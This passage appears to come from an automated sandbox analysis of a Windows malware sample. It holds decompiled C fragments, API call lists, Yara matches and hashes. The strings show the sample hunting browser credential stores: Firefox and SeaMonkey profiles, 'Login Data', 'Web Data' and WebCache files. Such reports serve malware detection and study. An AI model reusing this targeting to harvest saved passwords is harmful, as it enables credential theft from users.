                                                                                              					E004060FA(_t59 + 8, _t53, _t56, 4, _t31);
                                                                                              				} else {
                                                                                              					free( *_t56);
                                                                                              				}
                                                                                              				memcpy( *(_t59 + 0x10) + _t42, _a4, _v8);
                                                                                              				 *((char*)( *(_t59 + 0x10) + _t42 + _v8)) = 0;
                                                                                              				 *((intOrPtr*)( *_t56 +  *(_t59 + 0x1c) * 4)) = _t42;
                                                                                              				 *(_t59 + 0x1c) =  *(_t59 + 0x1c) + 1;
                                                                                              				_t25 =  *(_t59 + 0x1c) - 1; // -1
                                                                                              				return _t25;
                                                                                              			}














                                                                                              APIs
                                                                                              • strlen.MSVCRT ref: 00406A80
                                                                                              • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AA0
                                                                                                • Part of subcall function 004060FA: malloc.MSVCRT ref: 00406116
                                                                                                • Part of subcall function 004060FA: memcpy.MSVCRT ref: 0040612E
                                                                                                • Part of subcall function 004060FA: free.MSVCRT(00000000,00000000,75144DE0,00406B49,00000001,?,00000000,75144DE0,00406D88,00000000,?,?), ref: 00406137
                                                                                              • free.MSVCRT(?,00000001,?,00000000,?,?,00406DCF,?,00000000,?,?), ref: 00406AC3
                                                                                              • memcpy.MSVCRT ref: 00406AE3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: free$memcpy$mallocstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3669619086-0
                                                                                              • Opcode ID: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                                              • Instruction ID: e46d755c35f7a0493bef025674ad9543d325b8c94dab604409744cdcda2aebf9
                                                                                              • Opcode Fuzzy Hash: 5eb856daf9b2f55e9999836f5936cf74f251c15999897e978b7d5133cb55aa44
                                                                                              • Instruction Fuzzy Hash: 70116D71200700EFC730EF18D8819AAB7F5EF45328B108A2EF957A7691DB35F9658B54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Executed Functions

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F0F8
                                                                                              • memset.MSVCRT ref: 0040F10D
                                                                                              • memset.MSVCRT ref: 0040F122
                                                                                              • memset.MSVCRT ref: 0040F137
                                                                                              • memset.MSVCRT ref: 0040F14C
                                                                                                • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                                • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                                                                • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                                                • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                                                              • wcslen.MSVCRT ref: 0040F172
                                                                                              • wcslen.MSVCRT ref: 0040F183
                                                                                              • wcslen.MSVCRT ref: 0040F1BB
                                                                                              • wcslen.MSVCRT ref: 0040F1C9
                                                                                              • wcslen.MSVCRT ref: 0040F202
                                                                                              • wcslen.MSVCRT ref: 0040F210
                                                                                              • memset.MSVCRT ref: 0040F296
                                                                                                • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                                • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                              • API String ID: 2775653040-2068335096
                                                                                              • Opcode ID: 18f6131305a60b3f130847a1eef602165254ae3e8930c32a00b7771f504cc504
                                                                                              • Instruction ID: ad2d2467b554b91bbb49091aa47d9e820c56345a74be7af74479530b55ef6358
                                                                                              • Opcode Fuzzy Hash: 18f6131305a60b3f130847a1eef602165254ae3e8930c32a00b7771f504cc504
                                                                                              • Instruction Fuzzy Hash: 2A514472905219AADB20E751DD86ECF73BC9F44344F5004FBF109F6181EBB96B888B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00409102
                                                                                              • memset.MSVCRT ref: 0040911A
                                                                                                • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                              • wcslen.MSVCRT ref: 00409136
                                                                                              • wcslen.MSVCRT ref: 00409145
                                                                                              • wcslen.MSVCRT ref: 0040918C
                                                                                              • wcslen.MSVCRT ref: 0040919B
                                                                                                • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                                • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: wcslen$memset$FolderPathSpecialwcscatwcscpy
                                                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                              • API String ID: 2036768262-2114579845
                                                                                              • Opcode ID: 9b210f72750b98862afc15587b3a75268b6b997e6569292da8b093e0b4a2481a
                                                                                              • Instruction ID: 077c1189ed55963ee46c09665a9aee7869ceb3b17950e6b23e47196ee9b08e55
                                                                                              • Opcode Fuzzy Hash: 9b210f72750b98862afc15587b3a75268b6b997e6569292da8b093e0b4a2481a
                                                                                              • Instruction Fuzzy Hash: 0B21D972A4411D66E710E651DC85DDF73ACAF14354F5008BFF505E2082FAB89F844A6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: wcslen$memsetwcscatwcscpy
                                                                                              • String ID: Login Data$Web Data
                                                                                              • API String ID: 3932597654-4228647177
                                                                                              • Opcode ID: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
                                                                                              • Instruction ID: 391ffb8f75831278f4964df5f57522d74f6eb7522eeef9a3bb7e860aca09f0fd
                                                                                              • Opcode Fuzzy Hash: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
                                                                                              • Instruction Fuzzy Hash: 3621B83294411C7BDB10AB55DC89ACA73ACAF10368F10487BF418E6181EBF9AEC48A5C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F042
                                                                                              • memset.MSVCRT ref: 0040F057
                                                                                                • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                                • Part of subcall function 0040719A: wcslen.MSVCRT ref: 0040719B
                                                                                                • Part of subcall function 0040719A: wcscat.MSVCRT ref: 004071B3
                                                                                              • wcscat.MSVCRT ref: 0040F080
                                                                                                • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
                                                                                                • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
                                                                                                • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
                                                                                              • wcscat.MSVCRT ref: 0040F0A9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                              • API String ID: 1534475566-1174173950
                                                                                              • Opcode ID: b40f1a29007ee88b205eab30251de60a7177f83a5dcce95581a050599bf5dc33
                                                                                              • Instruction ID: 125a097a9f26af6413fbc01dcc411eb2579d6a3fd62fad3348166db73649eeaa
                                                                                              • Opcode Fuzzy Hash: b40f1a29007ee88b205eab30251de60a7177f83a5dcce95581a050599bf5dc33
                                                                                              • Instruction Fuzzy Hash: BF018EB294021C75DB207B668C86ECF732CDF45358F1044BEB504E7182D9B88E888AA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E0CE
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E0F7
                                                                                              • DeleteObject.GDI32(?), ref: 0040E129
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,00000000,0040E36A), ref: 0040E171
                                                                                              • LoadIconW.USER32(00000000,00000065), ref: 0040E17A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$DeleteHandleIconLoadModuleObject
                                                                                              • String ID:
                                                                                              • API String ID: 659443934-0
                                                                                              • Opcode ID: 5c24b57fa0e1cfdf7f3906394f540e2e73f2d4ee2212ac106c4666ba6c8c482e
                                                                                              • Instruction ID: 1cba439d4a63bd06fd13ecdd31e81b6a0d9710d4e5327182bdbee0994cb59d35
                                                                                              • Opcode Fuzzy Hash: 5c24b57fa0e1cfdf7f3906394f540e2e73f2d4ee2212ac106c4666ba6c8c482e
                                                                                              • Instruction Fuzzy Hash: 322193B19012989FDB30EF768C496DEB7A9AF84715F10863BF80CDB241DF794A118B58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 004380DE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                              • API String ID: 2221118986-1725073988
                                                                                              • Opcode ID: 03496f8306c80886dd27506145db1db38aee062ac88384c6cbfd816796756731
                                                                                              • Instruction ID: 9afff8ac9fdfbc15a9c7ae9a6e2295b57ef319e934304d2411a679509b53bb08
                                                                                              • Opcode Fuzzy Hash: 03496f8306c80886dd27506145db1db38aee062ac88384c6cbfd816796756731
                                                                                              • Instruction Fuzzy Hash: 36826971A00318AFDF25DF69C881AAEBBA1EF08318F14511EFD1597292DB79E841CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00405137: CloseHandle.KERNEL32(000000FF,004050C7,00000000,?,00408B2E,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409013,?,004091EB,000000FF), ref: 0040513F
                                                                                                • Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                                                              • GetLastError.KERNEL32(00000000,?,00408B2E,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409013,?,004091EB,000000FF,00000000,00000104), ref: 00405124
                                                                                                • Part of subcall function 00407B93: ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                                                              • String ID:
                                                                                              • API String ID: 2136311172-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: free
                                                                                              • String ID:
                                                                                              • API String ID: 1294909896-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions